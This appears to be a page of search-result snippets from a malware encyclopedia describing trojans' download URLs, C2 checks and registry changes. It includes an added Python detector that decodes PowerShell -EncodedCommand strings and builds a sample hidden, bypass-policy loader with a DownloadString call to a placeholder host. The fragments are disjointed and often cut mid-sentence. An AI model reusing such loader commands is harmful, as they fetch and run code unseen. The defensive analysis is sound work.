Search results, keyword: URL
" -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand {Base64 encoded PowerShell command} The Base64-encoded PowerShell command connects to the following URL to download a string
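A decoder for the invocation described above, as an added example that is not part of the original page or of any vendor's tooling: it resolves powershell.exe parameter abbreviations, decodes the -EncodedCommand Base64 (which wraps UTF-16LE text, not UTF-8), pulls any URL out of the decoded script, and flags the hidden-window / non-interactive / bypass combination. The sample command line, the script inside it and the host example.invalid are constructed for the example.

```python
"""Decode PowerShell -EncodedCommand values and flag loader-style flag sets.

Added example; not from the page or any vendor tool. Sample data below is
constructed and uses the reserved host example.invalid.
"""
import base64
import re

# Full powershell.exe parameter names and the explicit aliases documented in
# `powershell.exe /?`. PowerShell also accepts any unambiguous prefix, so
# -w, -noni, -ex and -enc all resolve; the loader text above spells them out.
CANONICAL = ("windowstyle", "noninteractive", "executionpolicy",
             "encodedcommand", "noprofile", "nologo", "command")
ALIASES = {"e": "encodedcommand", "ec": "encodedcommand",
           "ep": "executionpolicy", "ex": "executionpolicy"}
SWITCHES = {"noninteractive", "noprofile", "nologo"}  # take no value

URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def canonical_param(token):
    """Map a '-flag' token to its full parameter name; None if not a flag."""
    if not token.startswith("-"):
        return None
    name = token[1:].lower()
    if name in ALIASES:
        return ALIASES[name]
    matches = [c for c in CANONICAL if c.startswith(name)]
    return matches[0] if len(matches) == 1 else None


def decode_encoded_command(b64):
    """-EncodedCommand is Base64 over UTF-16LE script text.

    Returns None on malformed input (bad Base64, or an odd byte count that
    cannot be UTF-16) instead of raising, so it is safe to run over logs.
    """
    try:
        raw = base64.b64decode(b64, validate=True)  # binascii.Error is a ValueError
    except ValueError:
        return None
    if len(raw) % 2:
        return None
    return raw.decode("utf-16-le", errors="replace")


def encode_command(script):
    """Build an -EncodedCommand value the way the loader (or an admin) would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze(cmdline):
    """Resolve flags, decode the script, extract URLs and give a verdict.

    Tokenising on whitespace is enough here: the Base64 blob contains no
    spaces, and a quoted image path with spaces only yields value tokens.
    """
    tokens = cmdline.split()
    params = {}
    i = 0
    while i < len(tokens):
        name = canonical_param(tokens[i])
        if name is None:
            i += 1
            continue
        value = None
        if (name not in SWITCHES and i + 1 < len(tokens)
                and canonical_param(tokens[i + 1]) is None):
            value = tokens[i + 1]
            i += 1
        params[name] = value
        i += 1

    script = None
    if params.get("encodedcommand"):
        script = decode_encoded_command(params["encodedcommand"])
    urls = URL_RE.findall(script) if script else []

    hidden = (params.get("windowstyle") or "").lower() == "hidden"
    weakened = (params.get("executionpolicy") or "").lower() in ("bypass", "unrestricted")
    suspicious = "encodedcommand" in params and hidden and weakened
    return {"params": params, "script": script, "urls": urls, "suspicious": suspicious}


# Constructed sample: the flag set from the text wrapping a one-line downloader.
SAMPLE_SCRIPT = "(New-Object Net.WebClient).DownloadString('http://example.invalid/dl/payload.txt')"
SAMPLE_CMDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "-windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand "
    + encode_command(SAMPLE_SCRIPT)
)

if __name__ == "__main__":
    result = analyze(SAMPLE_CMDLINE)
    print("suspicious:", result["suspicious"])
    print("urls:", result["urls"])
    print("script:", result["script"])
```

The decoded script is where the download URL lives, so detection content that only regex-matches the raw command line for `http` misses this loader entirely; decode first, then extract.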
files in all drives Connect to a website to check the IP address Gather information about the affected computer Send the gathered information to a specific URL It locks the screen and displays the following image:
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It downloads a file from a certain URL then renames it
), Windows Server 2008, and Windows Server 2012.) NOTES: It appends pdf=FUQiFYcM to the URL to download the decoy PDF. JS/Nemucod.h (McAfee), Troj/JSDldr-BW (Sophos), Trojan-Downloader.JS.Agent.hhi
}report.com/images/2009/05/naughty-elephant.jpg It then saves and opens it as follows: %Current Folder%\{Malware Name}.jpg This is done to trick users into thinking that the executed file is legitimate. It then connects to the following URL to
execution. NOTES: This backdoor connects to the URL http://www.msn.com. a variant of Win32/Injector.BBMB trojan (NOD32), Troj/Agent-AGRG (SOPHOS_LITE)
visiting malicious sites. Download Routine This Trojan downloads the file from the following URL and renames the file when stored in the affected system: http://{BLOCKED}chingsolution.com/images/tere2611.exe
bypass, it downloads its shellcode as logo.gif. The URL from which it downloads its shellcode is the same location where this malware was uploaded. Troj/SwfExp-CM (Sophos), Exploit:SWF/ShellCode.U (Microsoft)
its installation routine: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main TabProcGrowth = "0" HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CURRENTVERSION\URL SystemMgr = "Del
Server 2008, and Windows Server 2012.) NOTES: It connects to the following URL to download data related to GeoIP https://www.{BLOCKED}d.com/en/locate-my-ip-address The downloaded data should not contain any
server safe_mode status web host URL web host server address remote user server address Stolen Information This backdoor sends the data it gathers to the following email addresses via SMTP: {BLOCKED
the file from the following URL and renames the file when stored in the affected system: http://{BLOCKED}5.{BLOCKED}3.com/tj.asp?time=20160101160935&mac=00-00-00-00-00-00&username=blog_folder&content
the file from the following URL and renames the file when stored in the affected system: http://{BLOCKED}ek.co.uk/system/logs/98yt It saves the files it downloads using the following names: %User Temp%
String2 any of the following filenames of the files found in %User Temp% It attempts to connect to an unknown malicious site; however, the URL is not specified. (Note: %User Temp% is the current user's Temp
{Server}/r Other Details This Backdoor does the following: This backdoor checks connectivity to the following URL to choose which C2 server it sends information to and receives information from: http://{BLOCKED}.{BLOCKED
following: Connects to the following URL for coin-mining activity: bit.p{BLOCKED}.com Format of the executed command: -v {algorithm} -o {CnC} -u {username} -p {password} -t {number of CPU threads}
Copy files and directories Move a directory or a file Create a new directory Change timestamps of a file or directory Download a file from a URL Execute a process and capture its output Connect to a SQL
remote URL where a copy of the worm may be downloaded. It may also post similar content to a Facebook wall. In order to accomplish its malicious routines, it downloads a configuration file from any of the
\Search Assistant DefaultSearchURL = "http://www.{BLOCKED}l.co.uk/index.php?page=search/web&search=" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes URL = "http://www.{BLOCKED